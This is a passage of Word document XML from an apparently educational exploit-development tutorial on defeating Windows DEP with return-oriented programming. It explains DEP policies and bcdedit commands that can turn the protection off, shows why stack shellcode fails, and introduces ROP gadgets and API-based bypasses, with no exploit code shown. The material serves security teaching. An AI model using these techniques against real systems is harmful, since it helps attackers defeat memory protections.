        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Windows Server 2003 SP1 and up : OptOut </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Windows Server 2008 and up : OptOut + Permanent DEP </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The DEP behavior on XP and 2003 server can be changed via a boot.ini parameter. Simply add the following parameter to the end of the line that refers to your OS boot configuration :</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 xml:space="preserve">/noexecute=policy </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>"policy"</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> can be  OptIn, OptOut, AlwaysOn or AlwaysOff)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Under Vista/Windows 2008/Windows 7, you can change the settings using the bcdedit command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bcdedit.exe /set nx OptIn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bcdedit.exe /set nx OptOut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bcdedit.exe /set nx AlwaysOn</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bcdedit.exe /set nx AlwaysOff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You can get the current status by running "bcdedit" and looking at the nx value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Some links about hardware DEP :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://support.microsoft.com/kb/875352</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Data_Execution_Prevention</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/aa366553(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="buildingblocks"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr/>
        <w:t>Bypassing DEP – Building blocks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As stated in the introduction, when hardware DEP is enabled, you cannot just jump to your shellcode on the stack, because it would not get executed. Instead, it would trigger an access violation and most likely terminate the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On top of that, each specific DEP setting (OptIn, OptOut, AlwaysOn, AlwaysOff) and the impact (or absence) of Permanent DEP will require (or will even dictate) a specific approach and technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="options"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>So, what are our options ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Well, since we cannot execute our own code on the stack, the only thing we can do is execute existing instructions/call existing functions from loaded modules and use data on the stack as parameters to those functions/instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>These existing functions will provide us with the following options :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">execute commands (WinExec for example – classic "ret-to-libc") </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">mark the page (stack for example) that contains your shellcode as executable (if that is allowed by the active DEP policy) and jump to it </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">copy data into executable regions and jump to it. (We *may* have to allocate memory and mark the region as executable first) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">change the DEP settings for the current process before running shellcode </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The currently active DEP policy and settings will pretty much dictate the technique(s) you have to use to bypass DEP in a certain scenario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A technique which should work all the time is "classic" ret-to-libc.  You should be able to execute simple commands, using existing Windows API calls (such as WinExec), but it will be hard to craft "real" shellcode with this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So we need to look further.  We really need to try to bypass/overrule/change the DEP settings and get our custom shellcode to run.   Luckily, marking pages executable / changing DEP policy settings / etc  can be done using native Windows OS API’s/function calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">So, is it that simple ? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Yes and no.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When we have to bypass DEP, we’ll have to call a Windows API (I’ll go into detail on these Windows API’s a little bit further down the road).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The parameters to that API need to be in a register and/or on the stack.  In order to put those parameters where they should be, we’ll most likely have to write some custom code. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Think about it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If one of the parameters to a given API function is for example the address of the shellcode, then you have to dynamically generate/calculate this address and put it in the right place on the stack. You cannot hardcode it, because that would be very unreliable (or, if the buffer cannot deal with null bytes and one of the parameters requires null bytes, then you would not be able to hardcode that value in your buffer). Using some small (shell)code to generate the value would not work either, because… DEP is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question :</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> How do we get those parameters on the stack ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">With custom code. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Custom code on the stack, however, cannot be executed. DEP would prevent that from happening.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Don’t believe me ?  Let’s try with our good old Easy RM to MP3 Convertor exploit from tutorial 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Without DEP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (OptIn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2466975" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Image3" desc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a:hlinkClick r:id="rId25"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2466975" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>With DEP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (OptOut)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2505075" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Image4" desc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a:hlinkClick r:id="rId28"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2505075" cy="1447800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Or, as seen in the debugger (with DEP enabled – OptOut), right when the first instruction of the shellcode would get executed (so directly after the jump esp is made) : </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>Movie</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2514600" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Image5" desc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a:hlinkClick r:id="rId31"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2514600" cy="2733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Trust me. Even a simple NOP will not get executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : in today’s tutorial, I will not discuss browser attacks, which may offer the possibility to user other/different techniques to bypass DEP (.Net user control, actionscript/java heap spraying, jit-spray, etc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="thegadget"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t>The gadget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Anyways, back to our "custom code" issue. So if running code from the stack won’t work, we have to use ROP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to run our custom code and eventually execute the Windows API function call, we will need to use existing instructions (instructions in executable areas within the process), and put them in such an order (and "chain" them together) so they would produce what we need and put data in registers and/or on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We need to build a chain of instructions.  We need to jump from one part of the chain to the other part of the chain without ever executing a single bit from our DEP protected region.  Or, to use a better term, we need to return from one instruction to the address of the next instruction (and finally return to the windows API call when the stack has been set up).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Each instruction (series of instructions) in our ROP chain will be called a "gadget".  Each gadget will return to the next gadget ( = to the address of the next gadget, placed on the stack), or will call the next address directly. That way, instruction sequences are chained together.   It’s important to understand that we are going to build ROP exploits for stack based overflows. That will be the location where our payload is placed, so it’s "normal" that we will return to the stack (because that’s most likely is going to be the place where the chain gets started, and thus acts as "caller" for the rop chain)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In his </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>original paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, Hovav Shacham used the term "gadget" when referring to higher-level macros/code snippets.  Nowadays, the term "gadget" is often used to refer to a sequence of instructions, ending with a ret (which is in fact just a subset of the original definition of a "gadget").  It’s important to understand this subtlety, but at the same time I’m sure you will forgive me when I use "gadget" in this tutorial to refer to a set of instructions ending with a RET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>While you are building a ROP based exploit, you’ll discover that the concept of using those gadgets to building your stack and calling an API can sometimes be compared to solving a Rubik’s [tm] Cube (Thanks Lincoln for the great comparison).  When you try to set a certain register or value on the stack, you may end up changing another one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So there is not generic way to build a ROP exploit and you will find it somewhat frustrating at times. But I can guarantee you that some persistence and perseverance will pay off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That’s the theory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="functioncalls"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>Windows function calls to bypass DEP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First of all, before you start writing an exploit, you need to determine what your approach will be.  What are the possible/available Windows API functions that can be used to bypass DEP in your current OS / DEP policy ?   Once you have determined that, you can think about setting up your stack accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>These are the most important functions that can help you to bypass/disable DEP :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
